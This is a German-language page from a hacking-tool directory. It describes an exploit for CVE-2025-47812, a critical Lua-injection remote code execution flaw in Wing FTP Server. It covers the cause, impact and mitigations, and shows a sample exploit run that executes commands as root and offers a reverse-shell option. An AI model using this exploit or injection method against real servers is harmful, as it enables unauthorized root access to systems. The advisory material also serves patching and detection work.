Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
Tools/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2025-47812 – Kritische RCE in Wing FTP Server 🛡️

🔎 Übersicht:

CVE-2025-47812 ist eine kritische Remote-Code-Ausführung (RCE)-Sicherheitslücke, die Wing FTP Server vor Version 7.4.4 betrifft. Sie wurde von einem Sicherheitsforscher entdeckt und es wurde bestätigt, dass sie aktiv in freier Wildbahn ausgenutzt wird.


🧱 Ursache:

Die Schwachstelle liegt in der Authentifizierungslogik des Wing FTP Servers, insbesondere darin, wie er Nullbytes (\0) im username-Parameter behandelt.

Angreifer können durch das Benutzernamenfeld beliebigen Lua-Code einschleusen, den der Server in die Sitzungsdatei schreibt. Wenn diese Sitzungsdatei später verarbeitet wird, wird der eingeschleuste Lua-Code ausgeführt, was Angreifern erlaubt, systemweite Befehle auszuführen.


🚨 Auswirkungen:

  • Schweregrad: CVSS-Score von 10.0 (Kritisch)
  • Erforderlicher Zugriff: Unauthentifizierter oder anonymer Zugriff reicht aus
  • Ausnutzung: Bestätigte aktive Ausnutzung
  • Erlangte Privilegien: Code läuft als SYSTEM (Windows) oder root (Linux/macOS)
  • Betroffene Plattformen: Windows, Linux und macOS

🔧 Abhilfe:

  • Sofort aktualisieren auf Wing FTP Server Version 7.4.4 oder höher.
  • Stellen Sie sicher, dass öffentlich zugängliche FTP-Server /loginok.html nicht für nicht vertrauenswürdige Netzwerke freigeben.
  • Überwachen Sie Protokolle auf ungewöhnliche Benutzernamen oder Lua-Code-Einschleusungen.
  • Implementieren Sie Netzwerksegmentierung, um FTP-Dienste von der internen Infrastruktur zu isolieren.

💀 Exploit:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
   CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>


------ Response End ------

⚠️ Haftungsausschluss

Dieser Exploit wird nur zu Bildungszwecken bereitgestellt. Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für die Sie explizite Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen